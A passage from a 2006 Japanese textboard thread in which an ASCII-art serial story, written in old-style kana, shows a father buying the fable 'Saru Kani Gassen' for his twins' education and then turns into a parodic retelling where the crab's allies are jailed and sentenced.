     l   |:.:.:.:l;';';';';';';';| /:.:.:.:.:| i=!ー=;: l   |    l. |   | /   //
       l  |:.:.:.:.:l;';';';';';';'|/:.:.:.:.:.:.!│ l    l、 :|    | } _|,.{::  7 
        l  |:.:.:.:.:.:l;';';';';'/:.:.:.:.:.:.:.:| |__,.ヽ、__,. ヽ._」 ー=:::レ'  ::::::|;   7
.      l |:.:.:.:.:.:.l;';';'/:.:.:.:.:.:.:.:.:.|. \:::::\::::: ヽ  ::::::!′ :::|   .:/
.       l |:.:.:.:.:.:.:∨:.:.:.:.:.:.:.:.:.:.:.!   /ヽ::: `:::    ::::  ....::..../


    /∵∴∵∴\
   /∵∴∵∴∵∴\
  /∵∴//   \|
  |∵/   (・)  (・) |
  (6       つ  |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |    ___ |   <  ネタなんかなんも無いくせに姉さんはすぐ糞スレを乗っ取るんだから。
   \   \_/ /     \__________________
     \____/


          (⌒Y⌒Y⌒)
          \__/__  
          /     \\  
         / \   / \ \ ) 
          | (・)  (・)   \ ⌒ )
        |  ⊂      9)  )  <意地でも乗っ取らせてもらう。
        |  ___   | )      
         \ \_/   /          
          \____/|            
      _,./| ヽ`ー--‐ _´.. ‐''´   ./  \、
-‐ '''"  ̄ /  :|   ,ゝ=<      /    | `'''‐- 、.._
     /   !./l;';';';';';';\    ./    │   _
      _,> '´|l. ミ:ゝ、;';';_/,´\  ./|._ , --、 | i´!⌒!l  r:,=i
.     |     |:.l. /';';';';';|=  ヽ/:.| .|l⌒l lニ._ | ゙ー=':| |. L._」
      l.    |:.:.l./';';';';';';'!    /:.:.| i´|.ー‐' | / |    |. !   l
.     l.   |:.:.:.!';';';';';';';'|  /:.:.:.:!.|"'|.   l'  │-==:|. ! ==l   ,. -‐;
     l   |:.:.:.:l;';';';';';';';| /:.:.:.:.:| i=!ー=;: l   |    l. |   | /   //
       l  |:.:.:.:.:l;';';';';';';'|/:.:.:.:.:.:.!│ l    l、 :|    | } _|,.{::  7 
        l  |:.:.:.:.:.:l;';';';';'/:.:.:.:.:.:.:.:| |__,.ヽ、__,. ヽ._」 ー=:::レ'  ::::::|;   7
.      l |:.:.:.:.:.:.l;';';'/:.:.:.:.:.:.:.:.:.|. \:::::\::::: ヽ  ::::::!′ :::|   .:/
.       l |:.:.:.:.:.:.:∨:.:.:.:.:.:.:.:.:.:.:.!   /ヽ::: `:::    ::::  ....::..../

64 :( ´∀`)さん:2006/10/19(木) 19:21:50 ID:nnWfcjGK0
>>63殿
その意気や良し。歴史的仮名遣ひで書かれては如何でせうか

65 :( ´∀`)さん:2006/10/20(金) 18:34:15 ID:bnzdWTo70
1/40

|                       |
|   堂 省 四 の 本      |
|________________|
       ガラツ

|||||||||| |.     |.   | ||||||||||||||||||||     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
=== ∧ ∧ |.   | ||||||  ∩∩  彡  | オヤ、
|||||||||| | (*゚∀゚) |        (´ー`)/  < 見掛けないお顏ですね。
ΠΠΠ .< ヽ/|つ|    _□ (   つ    \_________
□□□  ||/|||  |    |≡≡≡≡≡≡
 ̄ ̄ ̄| U U. |    | ̄ ̄ ̄ ̄ ̄ ̄


66 :( ´∀`)さん:2006/10/20(金) 18:34:53 ID:bnzdWTo70
2/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| こゝに來るのは初めてだからな!
| ホウ、確かに兄さんの言つたとほりだ。
| ご隱居、あんた今までの常連客の顏を覺えてゐるんだな。

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

|||||||||| |.          | ||||||||||||||||||||
===   ∧ ∧    | ||||||  ∩∩   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|||||||||| |   (*゚∀゚)       (´ー`) < 全員、と言つたら嘘になりますがね。
ΠΠΠ    < y >    _□ (   ) .| 大體は頭の中に入つてゐますよ。
□□□    ||/|||     |≡≡≡≡≡≡| ところで、あなたの言ふ「兄さん」とは、どなたですかの。
 ̄ ̄ ̄|   U U.    | ̄ ̄ ̄ ̄ ̄ ̄  \_______________________

67 :( ´∀`)さん:2006/10/20(金) 18:35:36 ID:bnzdWTo70
3/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ほら、こゝにちよくちよく來る堅物の物書きだよ。
| こオんな口して「我輩は…」「〜〜ですかな?」とか言ふ…

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

|||||||||| |.          | ||||||||||||||||||||
===   ∧ ∧    | ||||||  ∩∩   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|||||||||| |   (*゚Д⊂       (ー` ) < オヽ、擬古先生の弟さんでしたか。
ΠΠΠ   < y ノ    _□ (   )  | ぢやあ書物もよく讀まれるのでせうね。
□□□    ||/|||     |≡≡≡≡≡≡ \____________________
 ̄ ̄ ̄|   U U.    | ̄ ̄ ̄ ̄ ̄ ̄

68 :( ´∀`)さん:2006/10/20(金) 18:36:30 ID:bnzdWTo70
4/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| そ、それが…俺は兄貴とは違つて體が資本の男だからな。
| 腦味噌の方まで筋肉とくらア。 アヒヤヒヤヒヤヒヤ!!
| …それでだな、息子と娘に何かいゝ本を讀ませてやりたいんだが…
| さうだ。御伽話なんかゞいゝな。特に勸善懲惡ものがいゝや

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

|||||||||| |.           | ||||||||||||||||||||
===    ∧ ∧    | ||||||  ∩∩   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|||||||||| |   (;゚∀゚)       (ー` ) < さいですか。御伽話ですか。
ΠΠΠ   < y >    _□ (   )  | ウヽム…さうだ。『猿蟹合戰』なんかだうですか?
□□□    ||/|||     |≡≡≡≡≡≡ \____________________
 ̄ ̄ ̄|   U U.    | ̄ ̄ ̄ ̄ ̄ ̄

69 :( ´∀`)さん:2006/10/20(金) 18:37:01 ID:bnzdWTo70
5/40

\_WWWWWWWWWWWWWWWWWWWWWWWWWWWWW/
≫  『猿蟹合戰』か!何だか良さゝうな題名だな!    ≪
≫  決めた!それにするぞ!!!             ≪
≫  あつちの本棚だよな!?買ふことにしたぞ!!! ≪
/MMMM|MMMMMMMMMMMMMMMMMMMM| /MMMM、\
                            |/
|||||||||| |.            | ||||||||||||||||||||
===             | |||| エ? ∩∩   ∧ ∧
|||||||||| |                 (;´ー)  (゚∀゚*)
ΠΠΠ              _□ (   )   < つ つ
□□□  スタコラ サツサ     |≡≡≡≡≡≡ 川|||つ
 ̄ ̄ ̄|     ε= ε= ε= ε= ε=   (/

70 :( ´∀`)さん:2006/10/20(金) 18:37:36 ID:bnzdWTo70
6/40

\_WWWWWWWWWWWWWWWWWWWWWWWWWWWWW/
≫  あつたぞ!あつたぞ!!『猿蟹合戰』が!!     ≪
≫  色々と教へてくれて有難うよ、ご隱居!       ≪
≫  ほら、代金ならちやんと拂ふぞ!?          ≪
≫  持ち逃げなんて汚い眞似はしないからな!!!    ≪
/MMMM|MMMMMM| /MMMMMMMMMMMMMMMMM、\
             |/
|||||||||| |.            | ||||||||||||||||||||
===      ∧∧    | ||||Σ ∩∩
|||||||||| |      (*゚∀゚) つ ミ   (ー`;)
ΠΠΠ     日⊂ y ノ   。゚□ (   )
□□□     ⊂川|||   |≡≡≡≡≡≡
 ̄ ̄ ̄|        ヽ)  =3 =3 =3 =3 =3 =3

71 :( ´∀`)さん:2006/10/20(金) 18:38:34 ID:bnzdWTo70
7/40

         / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         | 今あの人が持つていつた本、確かに………
         | それにこの代金、明らかに拂ひ過ぎですな…
         \
            ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

|||||||||| |   |            .| ||||||||||||||||||||
===   |ガラツ        | |||| ∩∩
|||||||||| |   |             。。(ー`;)
ΠΠΠ   |            _ ⊂   )
□□□   |           |≡≡≡≡≡≡
 ̄ ̄ ̄|  |ヽ) =3 =3 =3  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

72 :( ´∀`)さん:2006/10/20(金) 18:39:23 ID:bnzdWTo70
8/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| オヽイ、歸つたぞオ!  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
\               | マアお歸りなさゐまし。散歩はどうでしたか。
   ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄  | おや。その手に持つてゐるのは何ですの。
                 \
  ∧ ∧日             ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  (*゚∀゚∩                 ∧∧
  < y ノ                 (゚A゚*)   ∧∧  ∧∧
  川|||つ  ━┳━━━━━┳━  ( つつ  (゚∀゚*) (゚∀゚*)
  (/       .┃       .┃   ⊂/) )  〜(,__)   (,__)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          ______________/|_____________
        /
        | 食べ物かな?また馬亞印の柏餠だつたらいゝなア。美味しかつたもの
        \_________________/|___________
           /
           | お兄ちやんは食ひしん坊だねエ。アヒヤヒヤ!
           \__________________

73 :( ´∀`)さん:2006/10/20(金) 18:40:31 ID:bnzdWTo70
9/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 聞いて驚くな。この通之助樣が、通太郎とツウ子の爲に
| 本屋で本を買つてきてやつたぞッ!!!

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

  ∧ ∧日      ∧∧  ∧∧          ピヨーン!!
  (* ゚∀∩   ε= (∀゚*)..) (∀゚*) ミ  ∧∧
  < y ノ       c(.c,_っ (,__)〜  (゚A゚#)ミ  ミ
  川|||    ━┳━━━━━┳━   (/  |  ミ  ミ
  (/∪       ┃       .┃    (  つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
            /|       /|
      \_WW/ |WWWWWW/ |WWWWW/
      ≫  ヤ ツ タ ア !!!   ≪
      /MMMMMMMMMMMMMMMMM、\
                           /|
 \_WWWWWWWWWWWWWWWWWWWWW/ |/
 ≫ ━┓ ━ ┃┃ 御飯食べる机に      ≪
 ≫   ┃━┓┃┃ 登つちや         ≪
 ≫ ━┛  ┃ ・ ・  駄目でせう!!!?   ≪
 /MMMMMMMMMMMMMMMMMMMMMM、\

74 :( ´∀`)さん:2006/10/20(金) 18:41:16 ID:bnzdWTo70
10/40

    ┌───────────────────────
    │それにしても、何故急に本なんか買ふ氣になつたのです?
  ┌┴────────────y──────────────
  │ほら、雙子だつてだいぶ大きくなつたゞらう。あと數年したら尋常小學校に通ふんだぞ?
  │だから、今までの育て方のまゝではいけないと思ふんだ。
  │エヽと、何だつたかな。ゾ、オソオ…
  └──y──────┬───────────
                  │情操教育、ですか?
                  └────y───────

   ∧∧                ∧∧
   (*゚∀゚)               (A゚*)     アヒヤヒヤ ホンダ     ヱホンカナ?
  < y > ━┳━━━━━┳━ ( y  )       (   ∧∧     ∧∧  )
  ( /つ )   .┃       .┃   (   つ     ⊂~⊃*゚∀)⊃日⊂(∀゚*⊂~つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

75 :( ´∀`)さん:2006/10/20(金) 18:42:13 ID:bnzdWTo70
11/40
  ┌───────────────────────────
  │それだ!!『ジヤウサウケウイク』だよ!!
  │確か、寶田の野郎(^д^,,) がそんな事を言つてゐたんだよ。
  └──y────┬───────────────────────────
              │寶田さんといつたら…同じ所で働いてるあの(^д^,,)さんですか。
              │ところでまだ寶田さんは獨身ぢやないの。
              └──────y───────────────

   ∧∧               Σ∧∧
  ∩* ゚∀)=3              (゚A゚*)
  ヽ y > ━┳━━━━━┳━ ( y  )       (   ∧∧     ∧∧  )
  ( /つ )  ┃       .┃   (   つ     ⊂~⊃*゚A゚)⊃日⊂(∀゚*⊂~つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

76 :( ´∀`)さん:2006/10/20(金) 18:42:46 ID:bnzdWTo70
12/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 昨日の晝、休憇時間の頃の話なんだがな…寶田が…

   ̄ ̄ ̄ ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ∧∧       ∧∧
         (*゚∀゚)      (゚A゚*)
       。 < y >      ( y  )
      O

〜〜〜〜○〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 先輩、一寸話が有るのですが。アハヽ

   ̄ ̄ ̄|/ ̄ ̄フ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          | 何だ、その蟲唾が走るやうな笑ひ方は。
          | それと、あらかじめ言つておくが、金は貸さないからな。
          | 俺はお前と違つて所帯持ちなんだからよオ。
           \____  ________________
                   V
     ∧∧
    (,,^д^)        ∧∧
    <:::::Y::>       (゚∀゚*)
    川川||        < y  >
    (/~∪        (⊂ヽ )

      |\
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 流石に今囘は違ひますよ。僕、一度も先輩から金を借りられた試しがありませんからね。
| さういへば先輩、先輩の家には雙子の御子樣がゐましたよね。何歳になつたんです?
\___________/|_________________________
  /
  | もう五つになつたが…通太郎とツウ子がどうかしたのかつてのかよ?
  \_____________________________


77 :( ´∀`)さん:2006/10/20(金) 18:43:27 ID:bnzdWTo70
13/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 『情操教育』つて御存知ですか?先輩

   ̄ ̄ ̄|/ ̄ ̄フ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          | ザウサウ…?雜巾か何かか
           \____  ________
                   V
     ∧∧            て
    (,,^д^)         ∧∧ そ
    <:::::Y::>        (゚∀゚*)
    川川||         < y  >
     ∪∪         (⊂ヽ )
      |\
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 嫌だなア先輩。ザフキンなんかぢやありませんよ。
| 『情操教育』ですよ。子供の教育の仕方の一つです。
| 歌や音樂を聞かせたり…いや、音樂とはいつても浪曲とかぢやなくて、
| 西洋のクラシツクなんかゞいゝですかね。
| それから他にも繪本を讀ませたりして、子供の知的な部分を伸ばすやうな教育を
| 『情操教育』と呼ぶのださうです。
\__________________________________

78 :( ´∀`)さん:2006/10/20(金) 18:43:57 ID:bnzdWTo70
14/40

       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       | で、そのザウサウ何とかは、一體何の役に立つゝて言ふんだよ。
       | 俺には難しすぎて何が何だかよく分からん。
       \
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧∧         ?
    (,,^д^)         ∧∧ ?
    <:::::Y::>      ?  (゚∀゚*)
    川川||         < y  > ?
     ∪∪         (⊂ヽ )
      |\
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 最初は僕自身も分からなかつたんですけどね。
| 横濱に住んでゐる僕の長兄つてのが、隨分とまあモダンな人で、
| 西洋の仕來たりや食事、子供の躾け方まで何でも情報を仕入れてくるんですよ。
| その中の一つが『情操教育』だつたのです。何でも、歐羅巴の上流階級の家では
| ほゞ全ての家で子供に情操教育をしてゐるさうですよ。
|
| 八年くらゐ前にそれを知つた僕の長兄が、自分の息子、
| …僕から見たら甥に當たるんですが、その子に情操教育をしたんですよ。
| その邊ぢや手に入らない樣な本をまだ幼い甥に讀ませたり、
| 歐羅巴のクラシツク音樂を、蓄音機で聽かせたりしてゐたさうです。
\___________/|_____________________
        /
        | で、どうなつたんだよ?その男の子は
        \________________

79 :( ´∀`)さん:2006/10/20(金) 18:45:08 ID:bnzdWTo70
15/40

  、___,
  ヽ===ノ       _(())_   ∧ ∧
   (,,^д^∩     ノハ~ヽ  (^д^,,)
   (|:::|::ノ      (д^,,)  く<V>~>
   |;;;|:;|       ( y )   | | |
   |:::|:::|       (  つ  し`J
   " "

(,,^д^) 尋常小學校に入つてからといふもの、その子、どん/\頭角を現し始めてゞすね、
    今では名門の中學の入學試驗に一位で合格して、長兄の家族の自慢になつてゐるんですよ。
(*゚∀゚) ヘエ。そりやあ凄いぢやねえか
(,,^д^) 長兄が自分の息子に情操教育を始めたのが、その子が五歳だつた頃なんです。
    だから先輩の家の雙子と同い年ですよ。
    もしかしたら、お宅の雙子もめき/\才能を現せるかもしれませんよ。

(*゚∀゚) うちの雙子か、か…

80 :( ´∀`)さん:2006/10/20(金) 18:45:41 ID:bnzdWTo70
16/40

    (⌒⌒)    ワツシヨイ!!
    l|l l|l        +      +  ワツシヨイ!!
    ∧∧    +  ∧∧ +  ∧∧ +
   ∩(#゚A゚∩    ∩*゚∀)   (*゚∀)っ +
   ヽ y ノ     (__,)ノ 〜(,__ノ
    [|,,,,,,,,j    ━┳━━━━━┳━
    (/∪       .┃       .┃
   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      /|
\_WW/ |WWWWWWWWWWWWWWWWWW/
≫                        ≪
≫ コラ!!                  ≪
≫  卓袱臺の上で踊るなと         ≪
≫  何度言つたら分かるの!!?    ≪
≫                        ≪
/MMMMMMMMMMMMMMMMMMMMMM、\

 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜○〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
                     O
     ∧∧ ?           。
    (,,^д^)         ∧∧ サイナウ、カ……
    <:::::Y::>        (;゚∀゚)
    川川||         < y  >
     ∪∪         (⊂ヽ )

81 :( ´∀`)さん:2006/10/20(金) 18:46:37 ID:bnzdWTo70
17/40

       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       | 分かつた。うちの子等にも試してみる事にするぞ。
       | 蓄音機はうちには無いから、まづは繪本から初めて見やうか!
       \
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧∧
    (,,^д^)         ∧∧
    <:::::Y::>        (゚∀゚*)
    川川||         < y  >
     ∪∪         (⊂ヽ )
      |\
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| その意氣ですよ、先輩。
| 先輩のお子さんも、僕の甥みたく成長するといゝですね。
| 將來は國會議員か軍人さんか。樂しみですねエ。アハヽハヽ…
\________________________________

〜〜〜〜〜〜〜〜○〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
          O
        。
   ∧∧               ∧∧
   (*゚∀゚)              (゚A゚*)
   < y > ━┳━━━━━┳━ ( y  )       (   ∧∧     ∧∧  )
  ( /つ )  ┃        ┃   (   つ     ⊂~⊃*゚∀゚)⊃日⊂(∀゚*⊂~つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |\             /|
/ ̄ ̄ ̄   ̄ ̄ ̄ ̄ / ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| と、いふ譯なんだ。 | さうだつたんですか。情操教育を通太郎逹に…
\________ | で、猿蟹合戰の本を買つてきたのですね。
              \_______________________

82 :( ´∀`)さん:2006/10/20(金) 18:47:14 ID:bnzdWTo70
18/40

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 流石濃子、物分りが早いな!それでこそ俺の嫁だ!
\             / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ |まア通之助さんたら…照れてしまひますわ
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄)/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| あ、抱擁はよしてくれよ。もう失神するのは御免だからな。アヒヤヒヤ
| オヽイ!通太郎!ツウ子!こつちへ來い!!
| その本お父さんが讀んでやる。!!

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ∧∧               ∧∧
   (*゚∀゚)              (゚A゚*)
   < y > ━┳━━━━━┳━ ( y  )       (   ∧∧     ∧∧  )
  ( /つ )  ┃        ┃   (   つ     ⊂~ ⊃∀゚*)⊃日⊂(∀゚*⊂~つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                                   /|       /|
                          \_WWWWW/ |WWWWWW/ |WWW/
                          ≫                   ≪
                          ≫   ハ ア ー イ !!    ≪
                          ≫                   ≪
                          /MMMMMMMMMMMMMMMMM、\

83 :( ´∀`)さん:2006/10/20(金) 18:47:48 ID:bnzdWTo70
19/40

   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   | ぢやあ讀み始めるぞ。
   | 「蟹の握り飯を奪つた猿はたうたう蟹に仇を取られた。」…
   | あれ?まう結末を言つちまうのか?
   \
      ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ∧∧ ?         ∧∧ ?
       (*゚∀゚)  ∧∧    (゚A゚*)    ∧∧
      < つl⌒l⌒l(゚*  )━━━━━┳━ (∀゚*)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

84 :( ´∀`)さん:2006/10/20(金) 18:48:20 ID:bnzdWTo70
20/40

           _   _          ヽ ノ
             |  ̄ ̄ |          ,'OEOヽ   +
     。 。   ∩| ´Д`|       (( (ヽ(゚Д゚ *)/) ))γ⌒ヽ +
      | |   ヽ   つγニ三ヽ     と   つ  (・∀・ )
  (V)(,,'∀`)(V)  )  ) ( Cゝ ・、,・)う 〜゚ |  |〜 ⊂  ⊂ )
    ミ( 三 )ミ  (__)⊂、⌒⊃゚Д゜)⊃   し`J   ( (  )

 蟹は臼、蜂、卵と共に、怨敵の猿を殺したのである。

―― その話はいまさらしないでも好い。
    たゞ猿を仕止めた後、蟹を始め同志のものはどう云ふ運命に逢したか、それを話すことは必要である。
    なぜと云へばお伽噺は全然このことは話してゐない。
    いや、話してゐないどころか、あたかも蟹は穴の中に、臼は臺所の土間の隅に、
    蜂は軒先の蜂の巣に、卵は籾殼の箱の中に、太平無事な生涯でも送つたかのやうに裝つてゐる。

85 :( ´∀`)さん:2006/10/20(金) 18:48:55 ID:bnzdWTo70
21/40

ケシカラン!
 、____,        _   _     ヽ ノ   +         、___, サツサト アルケ!!
  l;;=@=;l       |  ̄ ̄|     ,'OEOヽ  γ⌒ヽ +    l;=@=;;l
 ( `ハ´)        |´∀` ;|   (ヽ(TДT;)/)(・∀・;)    (・ハ・ #)    。 。
 (つ ☆ つ ―――⊂-⊂―)――⊂⊂―)―⊂-⊂―)―――⊂☆  つ、   | |
  | 吏警 |       | | |     |   |    | |  |      | 吏警 |   \('Д`;;)
 (__)_)     (_(__)       U ヽ)    (__(_)      (_(__)   (三三) . . .
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

しかしそれは僞である。
彼等は仇を取つた後、警官の捕縛するところとなり、ことごとく監獄に投ぜられた。

86 :( ´∀`)さん:2006/10/20(金) 18:49:28 ID:bnzdWTo70
22/40

─────┐
   ∧_∧ |    ∩_∩    ∧_∧
  ( ´∀`) |   (´ー`)   ( `∀´)
  ,丿~,  ~ヽ│  丿~, ~ヾ  丿~,  ~.ヾ、
   | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |.         A_A.  < 因つて、被告を死刑に處す!
    |         (  ・w・)   \_____________
    |          ノ~,   iO)、          |    。 。
    |  | ̄ ̄|~. ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄.|    | |          ∧_∧
  ∧|_∧     |               ┌─┬ (V) (`;; )(V)  ,,'⌒丶、 (´<_` )
 (   `)    |               │  │  ミ(  )ミ_ ゝ@==> (〈y〉と)
